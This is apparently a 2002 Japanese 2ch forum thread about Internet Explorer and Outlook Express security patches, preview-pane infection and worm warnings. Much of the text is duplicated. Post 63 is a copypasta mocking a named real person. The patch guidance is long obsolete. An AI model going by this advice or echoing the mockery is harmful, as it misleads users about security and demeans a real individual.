5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q321232がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-023.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-009.asp
バージョンに表示されません。
リンクがうまくコピーできてなかったので再度スマソ
・以下のバージョンでかつQ321232がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q321232がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
バージョンに表示されません。
・以下のバージョンでかつQ321232がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2,NT4.0SP6aのみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q321232がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
バージョンに表示されません。
56 :名無しさん@お腹いっぱい。:02/05/18 11:50
MS02-09のq318089はバージョンに表示されなんですよね。
当てたかどうか忘れちゃったんだけど、確認する方法ないですか?
もう一回当てても不具合ないでしょうか?
当てたかどうか忘れちゃったんだけど、確認する方法ないですか?
もう一回当てても不具合ないでしょうか?
57 : :02/05/18 12:19
>>56
http://support.microsoft.com/default.aspx?scid=%2Fisapi%2Fgomscom%2Easp%3Ftarget%3D%2Fjapan%2Fsupport%2Fkb%2Farticles%2Fjp318%2F0%2F89%2Easp&LN=JA
http://support.microsoft.com/default.aspx?scid=%2Fisapi%2Fgomscom%2Easp%3Ftarget%3D%2Fjapan%2Fsupport%2Fkb%2Farticles%2Fjp318%2F0%2F89%2Easp&LN=JA
58 :名無しさん@お腹いっぱい。:02/05/18 21:49
>>57
そこを見てもよくわからないんですが・・・・
そこを見てもよくわからないんですが・・・・
59 :名無しさん@お腹いっぱい。:02/05/18 22:21
60 :名無しさん@お腹いっぱい。:02/05/18 23:53
>>59
ありがとう。そうします。
ありがとう。そうします。
61 :名無しさん@お腹いっぱい。:02/05/20 08:28
age
62 :名無しさん@お腹いっぱい。:02/05/20 09:36
EdMAX使ってるんだけど、とりあえず大丈夫?
63 :名無しさん@お腹いっぱい。:02/05/20 09:44
270 名前:参加するカモさん :02/05/20 07:43
西村って話し方変わったね
なんだか淡々としてクールでかっこよくなったね
でも本当の西村とはちょっと違うような気がするなあ
今は誰に憧れて誰の真似をしてるのかなあ
中学の頃は東京ラブストーリーの「完治」に憧れてたよねえ
放送日の翌日はガンガンに完治に成りきっちゃって、あのもどかしい喋り方を連発してたよねえ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ
それから西村って中学に入って急に背が伸びたよね
でもどうして学生服は取り換えなかったの?
ズボンはくるぶしが丸見えだったし、学生服は腰までしかなかったじゃん
あんな恰好で完治に成りきられても、ちょっとねぇ、、って感じだったよ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ
ついでに言っちゃうけど、西村って給食を飲み込む瞬間、どうしてあんなに目を見開くの?
癖なのかも知れないけど、なんか牛みたいでおかしかったよ
女子の間では給食の時間に「ひろゆきを見てはいけない」という黄金律があったんだよ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ
西村って話し方変わったね
なんだか淡々としてクールでかっこよくなったね
でも本当の西村とはちょっと違うような気がするなあ
今は誰に憧れて誰の真似をしてるのかなあ
中学の頃は東京ラブストーリーの「完治」に憧れてたよねえ
放送日の翌日はガンガンに完治に成りきっちゃって、あのもどかしい喋り方を連発してたよねえ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ
それから西村って中学に入って急に背が伸びたよね
でもどうして学生服は取り換えなかったの?
ズボンはくるぶしが丸見えだったし、学生服は腰までしかなかったじゃん
あんな恰好で完治に成りきられても、ちょっとねぇ、、って感じだったよ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ
ついでに言っちゃうけど、西村って給食を飲み込む瞬間、どうしてあんなに目を見開くの?
癖なのかも知れないけど、なんか牛みたいでおかしかったよ
女子の間では給食の時間に「ひろゆきを見てはいけない」という黄金律があったんだよ
今だから言うけど、そんな西村のことみんな「気持ち悪い」って言ってたよ
64 :IE5.01,IE5.5はパッチ適用後も問題あり?:02/05/22 12:36
重要 : MS02-023 セキュリティ情報の公開時点では、ローカル HTML リソースの
クロスサイト スクリプティング (CVE-CAN-2002-0189) の問題による、IE 6 以
外のバージョンに対する脆弱性は確認できませんでした。しかし、この問題の報告
者より他のバージョンについても同様の問題があるとの連絡を受け、弊社でも現在
確認を行っております。他のバージョンに対する詳細が確認でき次第このページに
てご案内いたします。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-023.asp
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
クロスサイト スクリプティング (CVE-CAN-2002-0189) の問題による、IE 6 以
外のバージョンに対する脆弱性は確認できませんでした。しかし、この問題の報告
者より他のバージョンについても同様の問題があるとの連絡を受け、弊社でも現在
確認を行っております。他のバージョンに対する詳細が確認でき次第このページに
てご案内いたします。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-023.asp
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
65 :名無しさん@お腹いっぱい。:02/05/22 13:27
66 :名無しさん@お腹いっぱい。:02/05/28 12:31
PostPet(Windows版)に添付ファイルを強制実行する脆弱性
http://headlines.yahoo.co.jp/hl?a=20020525-00000001-vgb-sci
http://headlines.yahoo.co.jp/hl?a=20020525-00000001-vgb-sci
67 : :02/05/28 13:37
IEのパッチで修正される,Outlookの“隠された”セキュリティ・ホール
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20020524/1/
(閲覧にはメンバー登録必要−無料)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20020524/1/
(閲覧にはメンバー登録必要−無料)
68 :名無しさん@お腹いっぱい。:02/05/28 13:49
70 :名無しさん@お腹いっぱい。:02/05/31 08:34
2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム
(Q321232) (MS02-023)
この問題に対する日本語版 KB を公開しました。次のリンク先をご覧下さい。
http://www.microsoft.com/JAPAN/support/kb/articles/JP321/2/32.asp
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-023.asp
登録日 : 2002/5/16 更新日 : 2002/5/30
(Q321232) (MS02-023)
この問題に対する日本語版 KB を公開しました。次のリンク先をご覧下さい。
http://www.microsoft.com/JAPAN/support/kb/articles/JP321/2/32.asp
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-023.asp
登録日 : 2002/5/16 更新日 : 2002/5/30
71 :名無しさん@お腹いっぱい。:02/05/31 22:33
何だかんだいってOEはデザインだけなら一番好き。
OEのセキュリティホールを狙ったウイルス被害はデザインをマトモにしない3rdメーラーの作者のせいにしてやる
OEのセキュリティホールを狙ったウイルス被害はデザインをマトモにしない3rdメーラーの作者のせいにしてやる
72 :名無しさん@お腹いっぱい。:02/06/01 00:42
>>71
変な考え方。
変な考え方。
73 :名無しさん@お腹いっぱい。:02/06/07 22:37
IE 5.5/6に深刻なホール,対策はGopherプロトコルを無効にすること
フィンランドのセキュリティ・ベンダー「Oy Online Solutions」は現地時間6月
4 日,Internet Explorer(IE)5.5/6 のセキュリティ・ホールを公表した。Web
ページや HTMLメール中のリンクをクリックすると,ユーザーのパソコン上で任意
のコード(プロ グラム)を実行させられる恐れがある。対策は,IEの設定を変更
してGopherプロトコ ルを無効にすること。パッチは公開されていない。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020607/1/
フィンランドのセキュリティ・ベンダー「Oy Online Solutions」は現地時間6月
4 日,Internet Explorer(IE)5.5/6 のセキュリティ・ホールを公表した。Web
ページや HTMLメール中のリンクをクリックすると,ユーザーのパソコン上で任意
のコード(プロ グラム)を実行させられる恐れがある。対策は,IEの設定を変更
してGopherプロトコ ルを無効にすること。パッチは公開されていない。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020607/1/
74 :名無しさん@お腹いっぱい。:02/06/07 23:40
>>73
ひとまず対処しますた。ありがd
ひとまず対処しますた。ありがd
75 :名無しさん@お腹いっぱい。:02/06/08 00:19
>>73
このスレッドは一応タイトルがメーラー関係だから↓の方がよかったかな
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/
このスレッドは一応タイトルがメーラー関係だから↓の方がよかったかな
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/
76 :名無しさん@お腹いっぱい。:02/06/08 22:14
77 : :02/06/12 10:59
>>73 MSが公表。http://pc.2ch.net/test/read.cgi/sec/1005605775/703とマルチスマソ
MS02-027 に関する情報
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.asp
MS02-027 に関する情報
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.asp
78 :MS02-030:02/06/28 09:01
OEとは関係ないがIEに関係するので…
「MS02-032: 2002 年 6 月 26 日 Windows Media Player 用の累積的な
修正プログラム (Q320920)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032ov.asp
クライアント―危険度高
特殊なメディア・ファイルを再生することで、 Internet Explorer のキャッシュ
を保存しているディレクトリ (フォルダ) のパスが公開される可能性のある問題です。
「MS02-032: 2002 年 6 月 26 日 Windows Media Player 用の累積的な
修正プログラム (Q320920)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032ov.asp
クライアント―危険度高
特殊なメディア・ファイルを再生することで、 Internet Explorer のキャッシュ
を保存しているディレクトリ (フォルダ) のパスが公開される可能性のある問題です。
79 :名無しさん@お腹いっぱい。:02/06/28 13:56
>>78
Windows Updateで更新可能ですた。
Windows Updateで更新可能ですた。
80 :名無しさん@お腹いっぱい。:02/06/28 17:25
ひろみちゅがBecky!のセキュリティホール晒しちゃってるけど、
「OE使うやつ糞、Becky!使え」つってたヤシはどういうんだろう。 (w
OEよかはるかにヘボな穴だよなぁ。他の(国産)メーラも同様の穴があるぽ。
「OE使うやつ糞、Becky!使え」つってたヤシはどういうんだろう。 (w
OEよかはるかにヘボな穴だよなぁ。他の(国産)メーラも同様の穴があるぽ。
81 :名無しさん@お腹いっぱい。:02/06/28 18:01
一般論だけど、ちょっとした見落としとかあとから見ると
「ヘボな穴」てのは案外あるみたい。
IEやOEの場合、ユーザーが多いからねらわれるもので、
ちょっとした穴でも表沙汰になるてのはありそうだけどね。
「ヘボな穴」てのは案外あるみたい。
IEやOEの場合、ユーザーが多いからねらわれるもので、
ちょっとした穴でも表沙汰になるてのはありそうだけどね。
82 :cheshire-cat:02/06/28 18:25
Outlook2002でhtmlメルを全てテキストにしちゃえば、割とセキュアな予感。
そうは言っても、いつも南の島とか子犬の画像を貼り付けたhtmlを送る漏れは、困った人なんだろうか。
そうは言っても、いつも南の島とか子犬の画像を貼り付けたhtmlを送る漏れは、困った人なんだろうか。
83 :名無しさん@お腹いっぱい。:02/06/29 01:41
WebBUG貼り付けて開封確認してる俺よりは健全かと…
84 :名無しさん@お腹いっぱい。:02/06/29 02:36
一般的にOE特有のセキュリティホールをついたものはOE以外は関係なかったりするけど、
IEに対するセキュリティホールをついたものはOEでなくても
IEコンポーネントをHTMLメール表示の手段に用いているメーラは感染する危険がある。
…ということはNetscape MessengerかShurikenを使えってこと!?
IEに対するセキュリティホールをついたものはOEでなくても
IEコンポーネントをHTMLメール表示の手段に用いているメーラは感染する危険がある。
…ということはNetscape MessengerかShurikenを使えってこと!?
85 :名無しさん@お腹いっぱい。:02/06/29 10:53
>>80 Becky!の古いバージョンに添付ファイルが強制起動されるセキュリティホール
http://memo.st.ryukoku.ac.jp/archive/200206.month/4294.html
Beckyの公式ページ http://www.rimarts.co.jp/becky-j.htm
http://memo.st.ryukoku.ac.jp/archive/200206.month/4294.html
Beckyの公式ページ http://www.rimarts.co.jp/becky-j.htm
86 :80:02/06/29 11:08
>>84
今回のはIEコンポーネントを使ってるせいじゃなく一時ファイルのハンドリングの問題、
OEではとっくに対処済みにもかかわらず、指摘されるまで放置されていた。
前に書いた事あるような気がするけど、OE以外の(特に国産の)メーラは検証されてないから
セキュリティホールが見っかって無いだけだって事が実証されたね。
! ! ! O E 使 え ! ! ! (w
今回のはIEコンポーネントを使ってるせいじゃなく一時ファイルのハンドリングの問題、
OEではとっくに対処済みにもかかわらず、指摘されるまで放置されていた。
前に書いた事あるような気がするけど、OE以外の(特に国産の)メーラは検証されてないから
セキュリティホールが見っかって無いだけだって事が実証されたね。
! ! ! O E 使 え ! ! ! (w
87 :名無しさん@お腹いっぱい。:02/06/29 11:14
デフォでhtml読むのとプレビュonなのが
初心者には最凶の欠陥だと思うのだが・・・
初心者には最凶の欠陥だと思うのだが・・・
88 :名無しさん@お腹いっぱい。:02/06/29 11:20
漏れも、常用ブラウザはOperaなのに、気に入ったメーラーが見つからなくて
結局OE6.0使ってる。もちろんたまにしか使わないIEのパッチはせっせと
当てているが。
OEもデフォルト設定見直すだけで随分とマシになると思う。
結局OE6.0使ってる。もちろんたまにしか使わないIEのパッチはせっせと
当てているが。
OEもデフォルト設定見直すだけで随分とマシになると思う。
89 :aaa ◆uFEuqEnA :02/06/29 17:44
[email protected]「A WinXP patch」
[email protected] 「Undeliverable mail--\\\"Φ楫\\\"」
[email protected] 「Scrolling」
[email protected]「溺豕楫」
ウイルスメールを添付してくるメルアド。
[email protected] 「Undeliverable mail--\\\"Φ楫\\\"」
[email protected] 「Scrolling」
[email protected]「溺豕楫」
ウイルスメールを添付してくるメルアド。
90 :名無しさん@お腹いっぱい。:02/06/29 19:58
( ゚Д゚)ハァ?
91 :名無しさん@お腹いっぱい。:02/06/29 22:09
92 :名無しさん@お腹いっぱい。:02/06/30 12:57
その「何も分かってない人」のせいでこれだけウィルスが広まってると思うんだが。
ウチの職場なんてhtml、プレビュOffの奴ほとんどおらんかったぞ。
どこの職場でも似たような惨状だろう。だからパソコン買って始めて使う
メーラがOEって現状がやばすぎるんでないかと。
ウチの職場なんてhtml、プレビュOffの奴ほとんどおらんかったぞ。
どこの職場でも似たような惨状だろう。だからパソコン買って始めて使う
メーラがOEって現状がやばすぎるんでないかと。
93 :名無しさん@お腹いっぱい。:02/07/10 19:38
>>91>>92
あの、すんません。
俺、「HTMLメールを表示」なんて項目をオフにした覚えが無くて慌ててオプション探したんですが見つからず、
調べてみても
デフォの送信をテキスト形式にする
プレビューoff
次の時間プレビューするとメッセージを開封済みにする
プレビューウィンドウで表示するメッセージを自動的にダウンロードする
のチェックをはずすくらいしか解説してなかったり…
どこっすか? 今までに一通もHTMLメール来た事無いけど、設定しとかないと不安です…
あの、すんません。
俺、「HTMLメールを表示」なんて項目をオフにした覚えが無くて慌ててオプション探したんですが見つからず、
調べてみても
デフォの送信をテキスト形式にする
プレビューoff
次の時間プレビューするとメッセージを開封済みにする
プレビューウィンドウで表示するメッセージを自動的にダウンロードする
のチェックをはずすくらいしか解説してなかったり…
どこっすか? 今までに一通もHTMLメール来た事無いけど、設定しとかないと不安です…
94 :名無しさん@お腹いっぱい。:02/07/10 21:41
>>93
>「HTMLメールを表示」なんて項目
91、92じゃ無いけど横から失礼。そいいう項目は「無い」。
あくまで「送信時の形式をhtmlかtextか」選択するだけ。html形式で送信
されるメールによって伝播するウィルスが有るのは確かだから、自分が
加害者になるのを防げるだけ。
で、以下は極論(識者の反論歓迎)
htmlメール見るなっていうのは「交通事故おこしたく無いなら車運転するな」
っていうのと同じでナンセンス、というのが俺の考え。html形式のメールは
text形式のメールでは表現できない良さが有るし、それ自体が悪ではない。
http://japan.internet.com/wmnews/20020624/1.html
こういう話も有る。
不安になるくらいだからAVソフトの導入くらいはやってるんだろう?
そうなら、恐れるな。
・添付ファイルを安易に実行しない。
・プレビューをオフ(これもフィルタールールを設定してうまく振り分ければ
を俺は必要無いと思うが)
で充分だよ。
>「HTMLメールを表示」なんて項目
91、92じゃ無いけど横から失礼。そいいう項目は「無い」。
あくまで「送信時の形式をhtmlかtextか」選択するだけ。html形式で送信
されるメールによって伝播するウィルスが有るのは確かだから、自分が
加害者になるのを防げるだけ。
で、以下は極論(識者の反論歓迎)
htmlメール見るなっていうのは「交通事故おこしたく無いなら車運転するな」
っていうのと同じでナンセンス、というのが俺の考え。html形式のメールは
text形式のメールでは表現できない良さが有るし、それ自体が悪ではない。
http://japan.internet.com/wmnews/20020624/1.html
こういう話も有る。
不安になるくらいだからAVソフトの導入くらいはやってるんだろう?
そうなら、恐れるな。
・添付ファイルを安易に実行しない。
・プレビューをオフ(これもフィルタールールを設定してうまく振り分ければ
を俺は必要無いと思うが)
で充分だよ。
95 :名無しさん@お腹いっぱい。:02/07/12 17:05
97 :名無しさん@お腹いっぱい。:02/07/12 22:47
IE6なんですけど、最近ネットしてるとHDDがカリカリいって、少しフリーズして
「このエラーを鯖に送信しますか」とメッセージが出てIEが終了します
何度も同じエラーが起こるので、修復しましたが、又同じエラーがでます
アップデートも、ちゃんとしてるのに原因はなんでしょうか?
「このエラーを鯖に送信しますか」とメッセージが出てIEが終了します
何度も同じエラーが起こるので、修復しましたが、又同じエラーがでます
アップデートも、ちゃんとしてるのに原因はなんでしょうか?
98 :名無しさん@お腹いっぱい。:02/07/12 22:49
>>97 仕様だよ(w 漏れのもたまに出るよ。
99 :名無しさん@お腹いっぱい。:02/07/12 23:05
>>98
たまじゃなくて、毎日出ますよ〜 修正パッチとか無いのかな?
たまじゃなくて、毎日出ますよ〜 修正パッチとか無いのかな?
100 :名無しさん@お腹いっぱい。:02/07/12 23:13
うんな糞、使わなければ解決だ(w
101 :名無しさん@お腹いっぱい。:02/07/13 00:35
>>97
俺もだ
俺もだ
102 :名無しさん@お腹いっぱい。:02/07/13 01:15
>>94
WebBUG仕込まれるぞ。
WebBUG仕込まれるぞ。
103 :Frethem蔓延中:02/07/15 17:29
WORM_FETHEM、W32.Frethem.J@mmはInternet Explorerのセキュリティホールを突く
ので、OEのプレビューだけで感染します。プレビューOFFにする、最新のバージョンに
しておくこと。
IE/OEの最新バージョン情報は>>55 プレビューの切り方>>11
バージョン確認方法はhttp://www2.ocn.ne.jp/~circle/IE_version.htm
ので、OEのプレビューだけで感染します。プレビューOFFにする、最新のバージョンに
しておくこと。
IE/OEの最新バージョン情報は>>55 プレビューの切り方>>11
バージョン確認方法はhttp://www2.ocn.ne.jp/~circle/IE_version.htm
104 :名無しさん@お腹いっぱい。:02/07/15 17:33
バージョン確認方法リンク切れスマソ。
IE:ヘルプ→バージョン情報
IE:ヘルプ→バージョン情報
105 :名無しさん@お腹いっぱい。:02/07/17 12:51
それにしても、いいかげんプレビューで感染は言わなくてもいいのに決まり文句になってるね。
もう6か5.5SP2(か5.01SP2)にしてないでプレビューで感染したら自業自得だと思う。
(あえて前の使ってる人は最低でもプレビューなんかしてないはず)
新しい穴の予知でもしてるのかな
もう6か5.5SP2(か5.01SP2)にしてないでプレビューで感染したら自業自得だと思う。
(あえて前の使ってる人は最低でもプレビューなんかしてないはず)
新しい穴の予知でもしてるのかな
106 :名無しさん@お腹いっぱい。:02/07/17 13:16
>>105 いまだに知らない人がいるのだからプレビュー感染告知して当然だろ。
自分が知っているからといって、自業自得は言い過ぎ。
自分が知っているからといって、自業自得は言い過ぎ。
107 :名無しさん@お腹いっぱい。:02/07/17 16:13
108 :名無しさん@お腹いっぱい。:02/07/17 18:23
このスレの8を見てみそ
109 :名無しさん@お腹いっぱい。:02/07/18 11:19
あの〜 初心者的な質問かも知れませんけど、、
OEのメールログファイル(.dbxファイル)の中身をワードパッドで見ると、
ほとんどの中身は暗号化されてて解らないんですけど、
はじめと終わりの方だけ暗号化されてなくて、
しかも,内容が2chのログとかなんです。
2chみるのはかちゅーしゃ使ってますけど、OEのログファイルに
かちゅのログが残るって変ですよね??
virusは検出されてないんですけど、何が問題なんでしょうか?
OEのメールログファイル(.dbxファイル)の中身をワードパッドで見ると、
ほとんどの中身は暗号化されてて解らないんですけど、
はじめと終わりの方だけ暗号化されてなくて、
しかも,内容が2chのログとかなんです。
2chみるのはかちゅーしゃ使ってますけど、OEのログファイルに
かちゅのログが残るって変ですよね??
virusは検出されてないんですけど、何が問題なんでしょうか?
110 :名無しさん@お腹いっぱい。:02/07/18 11:37
111 :名無しさん@お腹いっぱい。:02/07/18 11:54
>>106
> 自分が知っているからといって、自業自得は言い過ぎ
そうか?
105ではないけど、半ば自業自得だと思う。
プレビューしただけで感染する危険性があるっていう情報は、
2ちゃんでなくても、ネット上でいやと言うほど溢れてるわけだし。
("プレビュー感染"は事あるごとに告知するべきだとは思う)
そもそもウィルスに感染する大半は、
セキュリティ関連情報を収集するようなこともせず、
当然 バージョンアップもパッチあてもしないで、
デフォで使っている初心者or初級レベルのユーザーだろ。
("大半"は言い過ぎかもしれんが、過半数以上はそうだと思う)
初心者だからこそ情報収集を積極的にしなきゃいかんし、
どんな理由であれ、それをしないのはユーザーの怠慢だと思う。
> 自分が知っているからといって、自業自得は言い過ぎ
そうか?
105ではないけど、半ば自業自得だと思う。
プレビューしただけで感染する危険性があるっていう情報は、
2ちゃんでなくても、ネット上でいやと言うほど溢れてるわけだし。
("プレビュー感染"は事あるごとに告知するべきだとは思う)
そもそもウィルスに感染する大半は、
セキュリティ関連情報を収集するようなこともせず、
当然 バージョンアップもパッチあてもしないで、
デフォで使っている初心者or初級レベルのユーザーだろ。
("大半"は言い過ぎかもしれんが、過半数以上はそうだと思う)
初心者だからこそ情報収集を積極的にしなきゃいかんし、
どんな理由であれ、それをしないのはユーザーの怠慢だと思う。
112 :名無しさん@お腹いっぱい。:02/07/18 11:59
>>110
つこてる
つこてる
113 :名無しさん@お腹いっぱい。:02/07/18 12:02
>>112 Thanks.
114 :名無しさん@お腹いっぱい。:02/08/02 12:57
MS02-027Gopher問題のIE用パッチなかなか出ないなぁ。
IE6SP1はいつ出るのやら・・・
IE6SP1はいつ出るのやら・・・
115 :名無しさん@お腹いっぱい。:02/08/15 11:27
MS02-027Gopher問題のIE用パッチなかなか出ないなぁ。
IE6SP1はいつ出るのやら・・・
IE6SP1はいつ出るのやら・・・
116 :名無しさん@お腹いっぱい。:02/08/23 09:54
>>114-115
「MS02-047: Internet Explorer 用の累積的な修正プログラム (Q323759)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-047ov.asp
にてGopher問題に対処。
http://pc.2ch.net/test/read.cgi/sec/1005605775/755
「MS02-047: Internet Explorer 用の累積的な修正プログラム (Q323759)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-047ov.asp
にてGopher問題に対処。
http://pc.2ch.net/test/read.cgi/sec/1005605775/755
117 :IE最新バージョン:02/08/23 11:48
・以下のバージョンでかつQ323759がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q323759がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-009.asp
バージョンに表示されません。
なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となった。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232) の修正を含む。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q323759がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms02-009.asp
バージョンに表示されません。
なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となった。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232) の修正を含む。
MS02-009のリンクがうまく行ってないので再度スマソ
・以下のバージョンでかつQ323759がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q323759がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
バージョンに表示されません。
なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となった。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232)
の修正を含む。
・以下のバージョンでかつQ323759がついていればOK。
・インターネットエクスプローラのバージョン確認は、バージョン確認の「バージョン」で確認。
5.00.3315.1000 Internet Explorer 5.01 SP2 (Windows 2000SP2またはSP3のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.00.2600.0000 Internet Explorer 6(Win98/MEはフルまたは標準インストールのこと)
のいずれか。
・Q323759がついてなければ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-047ov.asp
の修正パッチを当てる。
・MS02-009については以下のページで確認の上該当パッチを当てる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp
バージョンに表示されません。
なお、Q323759の対象からNT4.0SP6aがはずされたのでIE5.01SP2はWindows2000でのみ最新状態となった。
Q323759は以前に公開された MS02-023 : 2002 年 5 月 15 日 Internet Explorer 用の累積的な修正プログラム (Q321232)
の修正を含む。
119 :名無しさん@お腹いっぱい。:02/08/28 12:03
保全あげ
120 :名無しさん@お腹いっぱい。:02/08/29 18:12
Netscapeブラウザ利用者、さらに減少
米Web解析サービス会社WebSideStoryのStatMarket部門は8月28日、Netscapeのブラウザを使うWebサーファーの割合が、全世界で3.4%にまで減少したと報告した。同ブラウザのシェアは1年前は13%、今年3月の時点では7%と報告されていた。
一方、MicrosoftのInternet Explorer(IE)を使うWebサーファーの割合は引き続き増加しており、前年の87%から96%に拡大したという。
同社の報告では、2002年8月26日現在、MicrosoftとNetscape以外のブラウザを使っている人の割合は全世界で0.64%。
なおオランダのWeb調査会社OneStat.comも6月に、Netscapeブラウザ全体のシェアは3.4%と報告している。(ZDNet)
http://headlines.yahoo.co.jp/hl?a=20020829-00000024-zdn-sci
0.64%の人は手あげて
米Web解析サービス会社WebSideStoryのStatMarket部門は8月28日、Netscapeのブラウザを使うWebサーファーの割合が、全世界で3.4%にまで減少したと報告した。同ブラウザのシェアは1年前は13%、今年3月の時点では7%と報告されていた。
一方、MicrosoftのInternet Explorer(IE)を使うWebサーファーの割合は引き続き増加しており、前年の87%から96%に拡大したという。
同社の報告では、2002年8月26日現在、MicrosoftとNetscape以外のブラウザを使っている人の割合は全世界で0.64%。
なおオランダのWeb調査会社OneStat.comも6月に、Netscapeブラウザ全体のシェアは3.4%と報告している。(ZDNet)
http://headlines.yahoo.co.jp/hl?a=20020829-00000024-zdn-sci
0.64%の人は手あげて
121 :名無しさん@お腹いっぱい。:02/08/29 18:16
>>118の通りにし、
5.5SP2用にQ323759をインストールしました。
バージョン確認の「バージョン」でも、Q323759がありました。
しかしUAは
HTTP_USER_AGENT . Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461)
と出ます。これで問題ないんですよね?
5.5SP2用にQ323759をインストールしました。
バージョン確認の「バージョン」でも、Q323759がありました。
しかしUAは
